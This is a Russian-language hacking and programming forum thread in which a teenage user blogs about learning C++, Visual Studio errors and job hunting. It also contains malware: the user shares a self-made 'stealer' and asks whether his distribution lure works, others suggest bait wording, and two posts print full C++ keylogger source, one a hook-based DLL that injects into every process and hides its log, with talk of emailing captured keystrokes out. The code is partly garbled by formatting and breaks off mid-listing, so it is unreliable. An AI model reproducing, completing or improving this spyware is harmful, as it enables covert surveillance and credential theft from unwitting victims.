Ctrl+F6, Ctrl+Shift+F6 — переход к следующему окну, предыдущему(по принципу последний использовавшийся)
Ctrl+Tab, Ctrl+Shift+Tab — тот же эффект, только с отображением окон
Ctrl+Alt+Up, Ctrl+Alt+Down — выпадающий список открытых окон
Ctrl+- — переход к предыдущему положению курсора

— на панели инструментов
Ctrl+Up, Ctrl+Down — переход к следующей группе инструментов, предыдущей
Ctrl+PageUp, Ctrl+PageDown — переход к следующему окну, предыдущему

Компиляция и отладка:

Ctrl+F5 — запуск без отладки
Ctrl+Shift+B — сбилдить решение
Ctrl+D, Ctrl+E(комбинация) — список исключений при отладке
Ctrl+Shift+F9 — удалить все брейкпоинты

Рефакторинг:

Ctrl+R, Ctrl+M(комбинация) — выделение метода
Ctrl+R, Ctrl+E(комбинация) — инкапсуляция метода
Ctrl+R, Ctrl+I(комбинация) — выделение интерфейса
Ctrl+R, Ctrl+V(комбинация) — удаление параметра
Ctrl+R, Ctrl+O(комбинация) — изменить порядок параметров

Другое:

Ctrl+I — превращает курсор в бинокль, который при наведении на объект, выдает всплывающую подсказку о нем
Ctrl+Space — вывод подсказок IntelliSense
Ctrl+Alt+A — открытие командной строки
Ctrl+K, Ctrl+I(комбинация) — всплывающие подсказки
Ctrl+K, Ctrl+X(комбинация) — вставка шаблонов
Ctrl+K, Ctrl+F(комбинация) — форматирование выделенного текста
Ctrl+Alt+Space — вывод параметров функции при наборе
Ctrl+Shift+A — добавить новые item

— закладки(все в комбинации)
Ctrl+K, Ctrl+K — установить закладку
Ctrl+K, Ctrl+N — переход к следующей закладке
Ctrl+K, Ctrl+P — возврат к предыдущей закладке
Ctrl+K, Ctrl+L — удалить все закладки

И наконец, мое самое любимое — Ctrl+'.'(плюс точка на латинице)
Самая часто встречающаяся неточность — попытка использовать какой-то класс, который еще не создан, либо который не был подключен. Именно для этого и существует комбинация Ctrl+. Достаточно нажать после имени класса, как всплывающее окно предложит либо заинклюдить необходимую библиотеку, либо создать новый класс.

Цитата:

Источник: http://habrahabr.ru (https://hpc.name/redirector.html#http://habrahabr.ru)

BlackH
Я помню комиссию в военкомате проходил это было что-то.
Зашел в первый кабинет(3-й этаж),халя-баля-
там девка молодая года 23, рост,вес и.т.д померила мне,давай говорит своё дело.
Я-Какое дело?
Оказалось что нужно было его до этого еще взять))Побежал на первый этаж,взял своё перечеркнутое несколькими линями дело и вернулся опять в тот кабинет.
Заново измерили рост,вес.Оказалось уже на килограмм меньше))Хах,я окуел.

Стоматолога вообще не было.Глав врач спросил-"Зубы в поряде?" и поставил печать стоматолога-ГОДЕН.
Психиатр это -нечто.Там я был долго,дольше чем у всех врачей)Рассказывать всё не буду.
Представьте,я привык уже к разным рассказам про психиатров,про их вопросы с подвохом.
Захожу,так готов к этим вопросам,так их жду-что аж куй знает от чего улыбаюсь))Ахахах.
Она на меня смотрит серьёзным взглядом и думает-"Да походу парниша засвистел"....

После пошел к хирургу.Он попросил меня снять трусы и встать "раком"(геморой они так смотрят).
Хирург был послан на куй,открытым текстом.Я был послан к начальнику военкомата.(какой-то там хермаёр в третьем поколении).

После не больших моралей и угроз всякими стройбатами,и после того как он выслушал мою точку зрения- он мне сам поставил печать за этого хирурга))И написал годен.
Это была самая чудная комиссия в моей жизни.

vladyxa13
Цитата:

Сообщение от BlackH

Я помню комиссию в военкомате проходил это было что-то.
Зашел в первый кабинет(3-й этаж),халя-баля-
там девка молодая года 23, рост,вес и.т.д померила мне,давай говорит своё дело.
Я-Какое дело?
Оказалось что нужно было его до этого еще взять))Побежал на первый этаж,взял своё перечеркнутое несколькими линями дело и вернулся опять в тот кабинет.
Заново измерили рост,вес.Оказалось уже на килограмм меньше))Хах,я окуел.

Стоматолога вообще не было.Глав врач спросил-"Зубы в поряде?" и поставил печать стоматолога-ГОДЕН.
Психиатр это -нечто.Там я был долго,дольше чем у всех врачей)Рассказывать всё не буду.
Представьте,я привык уже к разным рассказам про психиатров,про их вопросы с подвохом.
Захожу,так готов к этим вопросам,так их жду-что аж куй знает от чего улыбаюсь))Ахахах.
Она на меня смотрит серьёзным взглядом и думает-"Да походу парниша засвистел"....

После пошел к хирургу.Он попросил меня снять трусы и встать "раком"(геморой они так смотрят).
Хирург был послан на куй,открытым текстом.Я был послан к начальнику военкомата.(какой-то там хермаёр в третьем поколении).

После не больших моралей и угроз всякими стройбатами,и после того как он выслушал мою точку зрения- он мне сам поставил печать за этого хирурга))И написал годен.
Это была самая чудная комиссия в моей жизни.

Огого!!!Что врачи вытворяют! Особенно удивил хирург. А начальник пусть сам сходил бы на так званый "мед осмотр"

vladyxa13
31.05.2013, 01:00
Сегодня зарегался на сайте http://www.intuit.ru (https://hpc.name/redirector.html#http://www.intuit.ru) . Думал, что-то новое будет по С++. Но все старое
C++ highlight

#include

старый вариант и не очень быстрый, а вот новый
C++ highlight

#include

. Материал не так понятен, как в книге C++: базовый курс - Герберт Шилдт. Шлдт нормально объясняет. А там какой-то программ средней спецификации - полуговно код и объяснения. Но на сайте можно получить какой-то диплом(пришел домой, распечатал и воаля ты спец в программировании )даже первоклассник может достать ответы в гугле. Вот и все первоклашка супер мега хацкер))ломанет шо хоч, он же диплом распечатал и побежал на первое сентября не в школу, как нормальные детишки, а на работу. Пойду диплом получу. Кароч ребята для общего развития после изучения спп печатайте диплом

Диплом не могу получить, поставили мне ограничение в скадке испытов. Всем советую читать книги, но уж в крайнем случае или если есть опыт смотреть видеокурсы и получать более обширные понятия о программировании.

Ух, я чут ли не забыл. Надо после того, как вы освоите какой-то ЯП, СРОЧНО бежать на http://www.intuit.ru (https://hpc.name/redirector.html#http://www.intuit.ru) и распечатывать диплом мега программа!

vladyxa13
02.06.2013, 01:00
Спасибо всем за поздравления, было очень приятно!Подарки вообще супер!!!Меня никогда так не поздравляли. Поздравило и на форуме, и в вк, и СМС, и звонком по телефону больше чем 50+ человек!!!

Я сегодня вечерком уежаю на природу месяца на 2. А то уже форум мой второй дом. Отвыкать от нета надо. Буду учить по книге С++. Приеду где-то в августе. Может буду заезжать домой на протяжении лета.

После днюхи осталось куча жратвы это торты пиццы и т. д. так обжираюсь остатками.

darei
Желаю хорошо отдохнуть и набраться побольше знаний )

vladyxa13
Цитата:

Сообщение от darei

Желаю хорошо отдохнуть и набраться побольше знаний )

Спасибо)))
По поводу сайта, который я хотел сделать, так я его закинул, но все равно к нему когда то вернусь.

vladyxa13
27.08.2013, 01:00
Всем привет, я снова с вами!

Хорошо отдохнул, набрался сил. Подучил плюсы, но маленькие процедурные проги только писать могу и чуть ООП. Пойду заканчивать курсы программиста, вот там точно нормально научусь клепать разнообразные программки.

vladyxa13
31.08.2013, 01:00
Вот создал свой стилер http://rghost.ru/48501383 (https://hpc.name/redirector.html#http://rghost.ru/48501383) Думаю распространять. Ну как легенда покатит?

Цитата:

Так я его и закинул...Ну не люблю возиться с этим делом! Возможно, возможно! Я когда-то этим займусь, а пока у меня попросту нет времени.
vladyxa13
13.11.2013

tickhack
31.08.2013, 01:00
Цитата:

Сообщение от vladyxa13

Вот создал свой стилер http://rghost.ru/48501383 (https://hpc.name/redirector.html#http://rghost.ru/48501383) Думаю распространять. Ну как легенда покатит?

Лучше напиши "Бесплатно ок на одноклассники , без смс , без регистрация" -D

agr
01.09.2013, 01:00
Цитата:

Сообщение от vladyxa13

вроде как норм,советую по больше расписать всякой фигни,типо как работает и почему(типо есть баг и т.д).

vladyxa13
30.09.2013, 01:00
Жил я. Жил мой комп, жрал электрику себе спокойно. Пару дней назад отключили нет, был у меня в городе град. Сижу я зырю в экран на скайп - нет сети, думаю нет так нет, я что от нета завишу. Включаю вижуалку 2010 С++ експресс едишн, создал проект "Классы"(начал их изучать, не очень сложная тема), добавил мейн.спп ,создал через конструктор класс. Пишу код, сверяюсь с книжкой Шитлдта Полный справочник по С++ и с видеоуроком. Кликаю на билд, жду, результат

Цитата:

c:\documents and settings\1\мои документы\visual studio 2010\Projects\my6\my6\my6.vcxproj : error MSB4014: построение остановлено из-за непредвиденной внутренней ошибки.
c:\documents and settings\1\мои документы\visual studio 2010\Projects\my6\my6\my6.vcxproj : error MSB4014: Microsoft.Build.Exceptions.BuildAbortedException: построение отменено. не удалось запустить MSBuild.exe как дочерний узел, так как невозможно найти его по адресу "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\MSBu ild.e xe". При необходимости укажите верное расположение в параметре BuildParameters или при помощи переменной среды MSBUILD_EXE_PATH.
c:\documents and settings\1\мои документы\visual studio 2010\Projects\my6\my6\my6.vcxproj : error MSB4014: в Microsoft.Build.BackEnd.NodeManager.AttemptCreateN ode(INodeP rovider nodeProvider, NodeConfiguration nodeConfiguration)
c:\documents and settings\1\мои документы\visual studio 2010\Projects\my6\my6\my6.vcxproj : error MSB4014: в Microsoft.Build.BackEnd.NodeManager.CreateNode(Nod eConfigura tion configuration, NodeAffinity nodeAffinity)
c:\documents and settings\1\мои документы\visual studio 2010\Projects\my6\my6\my6.vcxproj : error MSB4014: в Microsoft.Build.Execution.BuildManager.PerformSche dulingActi ons(IEnumerable`1 responses)
c:\documents and settings\1\мои документы\visual studio 2010\Projects\my6\my6\my6.vcxproj : error MSB4014: в Microsoft.Build.Execution.BuildManager.HandleNewRe quest(Int3 2 node, BuildRequestBlocker blocker)
c:\documents and settings\1\мои документы\visual studio 2010\Projects\my6\my6\my6.vcxproj : error MSB4014: в Microsoft.Build.Execution.BuildManager.IssueReques tToSchedul er(BuildSubmission submission, Boolean allowMainThreadBuild, BuildRequestBlocker blocker)

Полазил по нету нашел это чудо http://archive.msdn.microsoft.com/KB2298853 (https://hpc.name/redirector.html#http://archive.msdn.microsoft.com/KB2298853) , думал поможет, не так ли было, спокойно устанавливалось и так спокойно, что ошибка вылетела на 2 минуте установки. Я запечалил. Потом взял себя в руки снес студию и установил ее заново открываю, компайлю тоже самая ошибочка. Надоело мне с этим провозился часа три, а она падло не хочет пахать, снес и ее. Установил ДевС++, ну не удобно мне в нем работать, снес. Настала очередь КодеБлокс - прикольный компилятор, но мои кривые руки и незнание как настраивать таково рода компайл - убили его. Я просто написал стандартный хелоу ворлд, нажал скомпилировать, и ка ка-ето ошибка, полез на КиберФорум, там написано, что компайл криво прикручен, мне лень было разбираться снес КодеБлокс. Скачал установщик Microsoft Visual C++ 2008 Express Edition with SP1 - RUS, думаю полетит ща, и меня ожидал великий облом

Цитата:

При установке Microsoft Visual C++ 2008 Express Edition with SP1 - RUS: возникла ошибка. Установка не выполнена.

Может быть после переустановки винды или восстановления Windows XP и точки восстановления(что-то типа того) все будет норм?

Цитата:

На заметку:
Там проблема весьма легка. А угадайте, внимательно вчитайтесь в ошибку. У меня стоит 3.5 фрейм, а у вижуалки 4.0, вот здесь и не совместимость. Просто когда работаешь в консольках, то все норм, а если с формочками, то фрейм летит. Тоже самое и в шарпах.
vladyxa13
13.11.2013

vladyxa13
30.09.2013, 01:00
Установилась вижуалка!!!Просто не установился скюель сервак. Я очень рад, что восьмая студия захотела работать, а вот, что с десятой делать, я не пойму.

vladyxa13
15.10.2013, 01:00
Время идет. Мой ком стареет и начинает сильно лагать и я с этим уже поделать ниче не могу(все перепробовал, но не о том речь). С Макрософт не знаю что будет. Начал я знакомиться с D. Для меня экзотика еще та. C#,C,C++,капля Java и других. Сильно заинтриговал. Вот нашел книгу для знакомства http://dynamic.dlang.ru/Files/2013/A...-_2010_rus.pdf (https://hpc.name/redirector.html#http://dynamic.dlang.ru/Files/2013/Alexandrescu_-_The_D_Programming_Language_-_2010_rus.pdf)
Синтаксис и похож с моим родным с++, но все же отличается. Думаю учить много не придется. Надо протестить выход за приделы массива, вроде бы там его запретили. Буду знакомиться

ZoRKeG
Если бы не знал, что за книга да и вообще про язык - местами мог бы подумать, что php...

vladyxa13
Цитата:

Сообщение от ZoRKeG

Если бы не знал, что за книга да и вообще про язык - местами мог бы подумать, что php...

Им его еще пилить и пилить...и стандартизировать...

Я не пойму как в Ди считывать символы с клавиатуры, бред, в плюсах и с все интуитивней

все мои нервы здали, на сегодня изучение Ди окончено........

ChEcHeNeC
16.10.2013, 01:00
Цитата:

Сообщение от MaCroSs

Седне тоже задумался о смене своей тачилы)))
Пока остановился на Lenovo IdeaPad G500A (59-381062)

Коплю на Apple MacBook Pro MD322RS

А у меня Lenovo IdeaPad y550p

MaCroSs
16.10.2013, 01:00
Цитата:

Сообщение от vladyxa13

Время идет. Мой ком стареет и начинает сильно лагать и я с этим уже поделать ниче не могу(все перепробовал, но не о том речь). С Макрософт не знаю что будет. Начал я знакомиться с D. Для меня экзотика еще та. C#,C,C++,капля Java и других. Сильно заинтриговал. Вот нашел книгу для знакомства http://dynamic.dlang.ru/Files/2013/A...-_2010_rus.pdf (https://hpc.name/redirector.html#http://dynamic.dlang.ru/Files/2013/Alexandrescu_-_The_D_Programming_Language_-_2010_rus.pdf)
Синтаксис и похож с моим родным с++, но все же отличается. Думаю учить много не придется. Надо протестить выход за приделы массива, вроде бы там его запретили. Буду знакомиться

Седне тоже задумался о смене своей тачилы)))
Пока остановился на Lenovo IdeaPad G500A (59-381062)

Коплю на Apple MacBook Pro MD322RS

vladyxa13
18.10.2013, 01:00
Начал искать работу на джуниора спп, как же это сложно. Везде нужно высшее или не законченное высшее. Ну и стаж работы. Нашел вакансии майкрософт, буду звонить.

Есть и другие вакансии, но там надо больше знаний

Wcfs
Цитата:

Сообщение от vladyxa13

Нашел вакансии майкрософт, буду звонить.

Тебе же вроде 14 лет насколько помню...Не думаю что тебя возьмут туда

kipishnoy
Цитата:

Сообщение от vladyxa13

Начал искать работу на джуниора спп, как же это сложно. Везде нужно высшее или не законченное высшее. Ну и стаж работы. Нашел вакансии майкрософт, буду звонить.

Есть и другие вакансии, но там надо больше знаний

У меня не стажа не опыта не было, была книга Кевин Митник искусство обмана и вводный курс нлп костюм без галстука и огромное желание найти работу в офисе и обязательно большой конторе.
Все нашел)

longman2142
Цитата:

Сообщение от Wcfs

Тебе же вроде 14 лет насколько помню...Не думаю что тебя возьмут туда

Ему 13
vk.com/vladyxa13

glm1997
vk.com/vladyxa13 - это не он, и не его акаунт
И ему исполнилось 14 лет !!!

ChEcHeNeC
Цитата:

Сообщение от glm1997

vk.com/vladyxa13 - это не он, и не его акаунт
И ему исполнилось 14 лет !!!

А какая то разница 13-14 ? Не думаю что его возьмут туда , и вообще в таком возрасте не куда не возьмут(на нормальную работу).

kipishnoy
Цитата:

Сообщение от ChEcHeNeC

А какая то разница 13-14 ? Не думаю что его возьмут туда , и вообще в таком возрасте не куда не возьмут(на нормальную работу).

Возьмут если есть знания и если правильно преподнесет! Есть такое понятие 4-х часовой рабочий день. Да и можно договориться выполнять объемами. Вот и все.

vladyxa13
Цитата:

Сообщение от kipishnoy

Возьмут если есть знания и если правильно преподнесет! Есть такое понятие 4-х часовой рабочий день. Да и можно договориться выполнять объемами. Вот и все.

Позвонил в Майкрософт, у них автоответчик по продаже и тех. поддержке продуктов. Думаю обзванивать другие, мне на возраст плевать, у меня есть знания и точка, а совмещать школу и работу можно! Я могу приезжать в офис часа на 2-3, и дома еще работать, думаю фирме будет выгодно платить за работу 1000грн, если приблизительно я буду делать на 3000+ грн.

Меня поражает тенденция на рынке, нужны специалисты со стажем, а простых джуниоров путевых вакансий мало тем более на С++, в основном пхп.

Цитата:

Сообщение от kipishnoy

У меня не стажа не опыта не было, была книга Кевин Митник искусство обмана и вводный курс нлп костюм без галстука и огромное желание найти работу в офисе и обязательно большой конторе.
Все нашел)

Со мной был Герберт Шилдт "Полный справочник по С++" и "С++ Базовый курс". Освоил основы на ура, но практики не так много, на курсах мой код оценивают достаточно высоко. Чем более "такой шпендык", как я будет усердней искать и стараться, чем быстрее найдtn работу.

ZoRKeG
vladyxa13, У мелкософта своих специалистов хватает, грубо говоря, ты им и даром там накуй всрался. Да и без высшего образования ты вряд ли куда-то пойдешь, тем более в мелкософт. Разве что в гошу, да и то, они только уников берут. Если шаришь С то сделай свой проект и коси бабла, более выгодней чем идти и работать на дядю.
А если сделаешь запрос в мелкософт - они только по ржут и все -)

BlackH
Если ты будешь обладать всем тем что нужно будет работодателю то на твой возраст и не посмотрят.

Цитата:

Сообщение от vladyxa13

Меня поражает тенденция на рынке, нужны специалисты со стажем, а простых джуниоров путевых вакансий мало тем более на С++, в основном пхп.

Ну а ты сам кого бы взял?Естественно того кто со стажем.

vladyxa13
Подумал я, посмотрел на посты выше, и решил:
1.Буду доучивать Qt, OpenGL.
2.Пойду на рынок фриланса.
3.Поставил великую цель "освоить все ЯП по максимуму"
4.Сделать еще выше свой уровень знаний.

Вот такой у меня боевой настрой, буду начинать реализовывать свои цели. "Вижу цель - не вижу препятствий." Точка

kipishnoy
Фриланс не пробовал?

vladyxa13
Цитата:

Сообщение от kipishnoy

Фриланс не пробовал?

Буду пробовать, но там нужны знания Qt, поэтому буду его учить.
Если на фриланс, то надо больше знаний, буду продолжать усердно учить.

kipishnoy
Цитата:

Сообщение от vladyxa13

Буду пробовать, но там нужны знания Qt, поэтому буду его учить.
Если на фриланс, то надо больше знаний, буду продолжать усердно учить.

От одних учений толку мало, в этом деле практика нужна. Хоть я и сам полный 0 в этой теме но знаю много ребят кто кодит и по жизненному пути встречаю тех кто знает по 5 языков которые сейчас не знают программеры лет 25 в силу своего возраста. Тоесть те кто еще микросхемы кодил на ПК с диодным монитором) С ними в бильярд играть хожу

vladyxa13
19.10.2013, 01:00
Однажды столкнулся с проблемой, что нет компилятора на компе(на курсах в одном кабинете был, а когда переехали в другой нету). Так вот сеть там защищенная, скачать вижуалку или кьют криэйтер не могу. Пошел искать норм онлайн компиляторы давно был знаком с codepad (https://hpc.name/redirector.html#http://codepad.org/), но мне его функционала не хватало. Полез в каталоги онлайн компилов, один тормозит, второй мне не нравиться. Ну и нашел compilr (https://hpc.name/redirector.html#https://compilr.com/). Регаться две минуты, асортимент ЯП - C\C++,C#,Java,PHP,Python,Ruby,VB. Как на меня достаточно удобный, но все таки лучше компилятор на компе.

Сидя на лекции по Access, стало скучно и захотелось сдать тест по знанию плюсов, там было 18 вопросов(от самых азов до ООП). Результат 65% знания С++. Функции, наследование на ура, а вот полиморфизм и приведения типов, и небольшие аспекты не очень. Буду доучивать, хоть онлайн тест неточный, но общий уровень представить можно и понять куда развиваться.

vladyxa13
23.10.2013, 01:00
Хотел работать, практиковаться - нашел учителя через своего дядю, он позвонил другу прогграммеру, намерен меня учить. Протестировал все ООП - норм знания(тест не подвел), но увы он веб-кодер и шарпы знает, плюсы я сам должен осваивать(ну обобщенный вариант(классы и т.п.) в ++ переводить).
Зимушка прийдет и я на С++ пойду, вот там и зажгу

vladyxa13
25.10.2013, 01:00
Вот начал разбирать исходники хромиума (https://hpc.name/redirector.html#https://code.google.com/p/chromium/codesearch#search/&q=lang:^c%2B%2B$&sq=package:chromium&type=cs)(движок хрома, яндекс браузера и т.п.) В дальнейшем буду писать, что-то наподобие этого, только меньше.

Кусечек от пирога

C++ highlight

// Copyright (c) 2013 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "ash/cancel_mode.h"
#include "ash/root_window_controller.h"
#include "ash/shell.h"
#include "ui/aura/root_window.h"
namespace
ash {
void DispatchCancelMode()
{
Shell::RootWindowControllerList controllers(
Shell::GetAllRootWindowControllers())
;
for
(Shell::RootWindowControllerList::const_iterator i = controllers.
begin
();
i != controllers.
end
(); ++i) {
(*i)->
root_window
()->
AsRootWindowHostDelegate
()->
OnHostCancelMode
();
}
}

}
// namespace ash

Конечно можно было бы разработать свой браузер, но это пока мне не под силу. А вот разбирать код и понимать что он делает важно!
Вот такие делишки...

kipishnoy
Цитата:

Сообщение от vladyxa13

Вот начал разбирать исходники хромиума (https://hpc.name/redirector.html#https://code.google.com/p/chromium/codesearch#search/&q=lang:^c%2B%2B$&sq=package:chromium&type=cs)(движок хрома, яндекс браузера и т.п.) В дальнейшем буду писать, что-то наподобие этого, только меньше.

Кусечек от пирога

C++ highlight

// Copyright (c) 2013 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "ash/cancel_mode.h"
#include "ash/root_window_controller.h"
#include "ash/shell.h"
#include "ui/aura/root_window.h"
namespace
ash {
void DispatchCancelMode()
{
Shell::RootWindowControllerList controllers(
Shell::GetAllRootWindowControllers())
;
for
(Shell::RootWindowControllerList::const_iterator i = controllers.
begin
();
i != controllers.
end
(); ++i) {
(*i)->
root_window
()->
AsRootWindowHostDelegate
()->
OnHostCancelMode
();
}
}

}
// namespace ash

Конечно можно было бы разработать свой браузер, но это пока мне не под силу. А вот разбирать код и понимать что он делает важно!
Вот такие делишки...

И что он тут делает?

lolca
kipishnoy +5 xD
vladyxa13 Начни с "Hello world"

MaCroSs
Цитата:

Сообщение от lolca

kipishnoy +5 xD
vladyxa13 Начни с "Hello world"

Ну как же без твоих пяти копеек

Цитата:

kipishnoy

Что за мутант у тебя на аве?=))

kipishnoy
Цитата:

Сообщение от MaCroSs

Что за мутант у тебя на аве?=))

NIKTO 2 (https://hpc.name/redirector.html#http://www.cirt.net/nikto2) один из моих любимы сканеров.

MaCroSs
Цитата:

Сообщение от kipishnoy

NIKTO 2 (https://hpc.name/redirector.html#http://www.cirt.net/nikto2) один из моих любимы сканеров.

ахаха ну да,голову ему отрезал и на аву

vladyxa13
Цитата:

Сообщение от kipishnoy

И что он тут делает?

прочитав 3 исходника не поймешь как работает элемент проги, но все же принцип можно

Цитата:

Директивой препроцессора #include мы подключаем четыре файла: ash/cancel_mode.h,ash/root_window_controller.h,ash/shell.h,ui/aura/root_window.h.

Есть пространство имен ash которым обволакиваются все исходники хромиума, а также другие небольшие по объему пространства имен.

Задаем функцию void DispatchCancelMode(), помещаем туда метод класса ShellRootWindowControllerList controllers, а параметром метода является GetAllRootWindowControllers().

Выполняем цикл фор (переменная(точнее интератор (STL)) присваиваем начало(по идее списка) и выполняем этот цикл до тех пор пока не достигним его конца)
В теле выполняем:

указатель i обращается к root_window() та обращается к AsRootWindowHostDelegate() а она к OnHostCancelMode()

BlackH
Уже было подумал что ты там что-то интересное узрел...Эх,снова обманули.

Цитата:

прочитав 3 исходника не поймешь как работает прога, но все же принцип можно

Мне кажется что прочитав всего 3 из ~1000 - вообще ничего понять нельзя.
Вспоминаю что смотрел сырки лисы,теперь думаю что мне не кажется.

vladyxa13
Цитата:

Сообщение от BlackH

Уже было подумал что ты там что-то интересное узрел...Эх,снова обманули.

Мне кажется что прочитав всего 3 из ~1000 - вообще ничего понять нельзя.
Вспоминаю что смотрел сырки лисы,теперь думаю что мне не кажется.

Обманул я(неправильно выразился, не всю прогу, а кусок), плохой я, куча кода и кашка с инклудами, вот помимо хрома, хочу освоить хуки(изучаю мануал).

vladyxa13
26.10.2013, 01:00
Нашел путевый сорц кейлогера на http://forum.k0d.cc/ (https://hpc.name/redirector.html#http://forum.k0d.cc/)

C++ highlight

#include
#include
#include
#include
using
namespace
std;
string GetKey(int Key)
{
string KeyString =
""
;
if
(Key ==
8
)
KeyString =
"[delete]"
;
else
if
(Key ==
13
)
KeyString =
"\n"
;
else
if
(Key ==
32
)
KeyString =
" "
;
else
if
(Key == VK_PAUSE)
KeyString =
"[PAUSE]"
;
else
if
(Key == VK_CAPITAL)
KeyString =
"[CAPITAL]"
;
else
if
(Key == VK_SHIFT)
KeyString =
"[SHIFT]"
;
else
if
(Key == VK_TAB)
KeyString =
"[TABULATOR]"
;
else
if
(Key == VK_CONTROL)
KeyString =
"[CTRL]"
;
else
if
(Key == VK_ESCAPE)
KeyString =
"[ESCAPE]"
;
else
if
(Key == VK_END)
KeyString =
"[END]"
;
else
if
(Key == VK_HOME)
KeyString =
"[HOME]"
;
else
if
(Key == VK_LEFT)
KeyString =
"[left]"
;
else
if
(Key == VK_RIGHT)
KeyString =
"[right]"
;
else
if
(Key == VK_UP)
KeyString =
"[UP]"
;
else
if
(Key == VK_DOWN)
KeyString =
"[DOWN]"
;
else
if
(Key == VK_SNAPSHOT)
KeyString =
"[SNAPSHOT]"
;
else
if
(Key == VK_NUMLOCK)
KeyString =
"[NUMLOCK]"
;
else
if
(Key ==
190
|| Key ==
110
)
KeyString =
"."
;
else
if
(Key >=
96
&& Key
47
&& Key
64
&& Key <
91
)
{
if
(
GetKeyState
(VK_CAPITAL))
KeyString = Key;
else
{
Key = Key +
32
;
KeyString = Key;
}
}
}
return
KeyString;
}
int main()
{
string Filename =
"C:\\log.txt"
;
string TempString =
""
;
fstream FStream;
FStream.
open
(Filename.
c_str
(), fstream::out | fstream::app);
while
(
true
)
{
Sleep
(
5
);
for
(
int
i =
8
; i <
191
; i++)
{
if
(
GetAsyncKeyState
(i)&
1
==
1
)
{
TempString =
GetKey
(i);

FStream.
write
(TempString.
c_str
(), TempString.
size
());
FStream.
close
();
FStream.
open
(Filename.
c_str
(), std::fstream::out | std::fstream::app);
}
}
}
}

Можно прокачать кейлогер до такого уровня....просто добавив еще хуков и отправку на мыло отчета
требования гугл,тишина, компилятор, время = кул кейлогер

BlackH
26.10.2013, 01:00
Таких кейлогеров уйма.На любой ЯП мона найти.
Кульного мало в нем.Хуков нет в нем а если и добавлять их то уже проще с нуля написать,ибо данный сорец работает на опросах клавы,аля:"нажата клавиша или нет?". Легко детектят аверы и различные анти спайи.
У кейлогера на хуках немного по другому всё:

C++ highlight

#include
#include
#define MAX 256 // who else loves 256? =)
//my macros
#define my_toLower(x) ((x >= 'A') && (x = 'A') && (x "
,
"/?"
,
"\\|"
};
//does ABSOLUTELY NOTHING!!!
LRESULT CALLBACK DummyProc(int nCode,WPARAM wParam,LPARAM lParam)
{
return
CallNextHookEx
(hInjectionHook,nCode,wParam,lParam);
}
//The Hook makes our Dll Injected into every process that has a Message Queue
//DRAWBACK : Console Programs are NOT hooked...
BOOL WINAPI InstallHook()
{
if
(hInjectionHook)
return
TRUE;
hInjectionHook =
SetWindowsHookEx
(WH_CALLWNDPROC,DummyProc,g_hInstance,
0
);
return
(hInjectionHook !=
NULL
);
}
//Plz Note The Keylogger does NOT Stop...
//By Uninstalling the Injection Hook, Spynet Will not inject future instances of processes
BOOL WINAPI UninstallHook() //return true if unhook successfull
{
if
(!hInjectionHook)
return
TRUE;
//no hook to unhook
BOOL bRet =
UnhookWindowsHookEx
(hInjectionHook);
if
(bRet) hInjectionHook =
NULL
;
return
bRet;
}
BOOL AppendLog(char *szData) //MUST be ASCIIZ string
{
DWORD dwTemp;
return
WriteFile
(g_hLogFile,szData,
strlen
(szData),&dwTemp,
0
);
}
char getShiftChar(WPARAM wParam)
{
for
(
int
i=
0
;i
1
)
{
switch
(wParam)
{
case
VK_RETURN :
strcpy
(szKey,
"\r\n"
);
break
;
case
VK_SPACE:
strcpy
(szKey,
" "
);
break
;
case
VK_DELETE:
strcpy
(szKey,
"[DEL]"
);
break
;
case
VK_MENU:
strcpy
(szKey,
"[ALT]"
);
break
;
case
VK_CONTROL:
strcpy
(szKey,
"[CTL]"
);
break
;
case
VK_ESCAPE :
strcpy
(szKey,
"[ESC]"
);
break
;
case
VK_BACK:
strcpy
(szKey,
"[BSP]"
);
break
;
case
VK_TAB :
strcpy
(szKey,
"[TAB]"
);
break
;
case
VK_SHIFT :
strcpy
(szKey,
"[SFT]"
);
break
;
case
VK_CAPITAL :
strcpy
(szKey,
"[CPLK]"
);
break
;
case
VK_SCROLL :
strcpy
(szKey,
"[SRLK]"
);
break
;
:
AppendLog
(
"["
);
strcat
(szKey,
"]"
);
break
;
}
}
}
AppendLog
(szKey);
}
return
CallNextHookEx
(hInjectionHook,nCode,wParam,lParam);
}
BOOL InstallKeyLoggerHook()
{
if
(hKLoggerHook)
return
TRUE;
hKLoggerHook =
SetWindowsHookEx
(WH_KEYBOARD,KLogProc,g_hInstance,
0
);
return
(hKLoggerHook !=
NULL
);
}
BOOL UninstallKeyLoggerHook() //return true if unhook successfull
{
if
(!hKLoggerHook)
return
TRUE;
//no hook to unhook
BOOL bRet =
UnhookWindowsHookEx
(hKLoggerHook);
if
(bRet) hKLoggerHook =
NULL
;
return
bRet;
}
void logHeader(BOOL bBegin)
{
char
szBuf[MAX *
2
],szTemp[MAX];
SYSTEMTIME systime;
DWORD dwTemp;
GetLocalTime
(&systime);
if
(bBegin)
strcpy
(szBuf,
"\r\nSpynet Session Begin: "
);
else
strcpy
(szBuf,
"\r\nSpynet Session End: "
);
//[H]H:MM
wsprintf
(szTemp,
"%d:%02d, "
,systime.wHour,systime.wMinute);
strcat
(szBuf,szTemp);
//MM/DD/YYYY
wsprintf
(szTemp,
"%d/%d/%d"
,systime.wMonth,systime.wDay,systime.wYear);
strcat
(szBuf,szTemp);
if
(bBegin)
{
strcat
(szBuf,
"\r\nUser : "
);
dwTemp = MAX;
GetUserName
(szTemp,&dwTemp);
strcat
(szBuf,szTemp);
}
AppendLog
(szBuf);
}
char * GetFileName(char *Path)
{
char
*temp = Path;
for
(
int
i=
0
;Path[i] !=
0
;i++)
if
(Path[i] ==
'\\'
) temp = &Path[i+
1
];
return
temp;
}
//logs headers for log files (time,date,logged in username)
BOOL PrepareLogFile()
{
//GetWindowsDirectory(g_logPath,MAX_PATH); //or GetSystemDirectory() (recommended)
GetCurrentDirectory
(MAX_PATH,g_logPath);
//log file is created in the processes current directory
if
(g_logPath[
strlen
(g_logPath) -
1
] !=
'\\'
)
strcat
(g_logPath,
"\\"
);
strcat
(g_logPath,
GetFileName
(g_exePath));
// log file will be "iexplore.exe.log"
strcat
(g_logPath,
".log"
);

g_hLogFile =
CreateFile
(g_logPath,GENERIC_WRITE,
NULL
,
0
,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,
0
);
//On Release : Add Hidden Attribute.
if
(g_hLogFile != INVALID_HANDLE_VALUE)
{
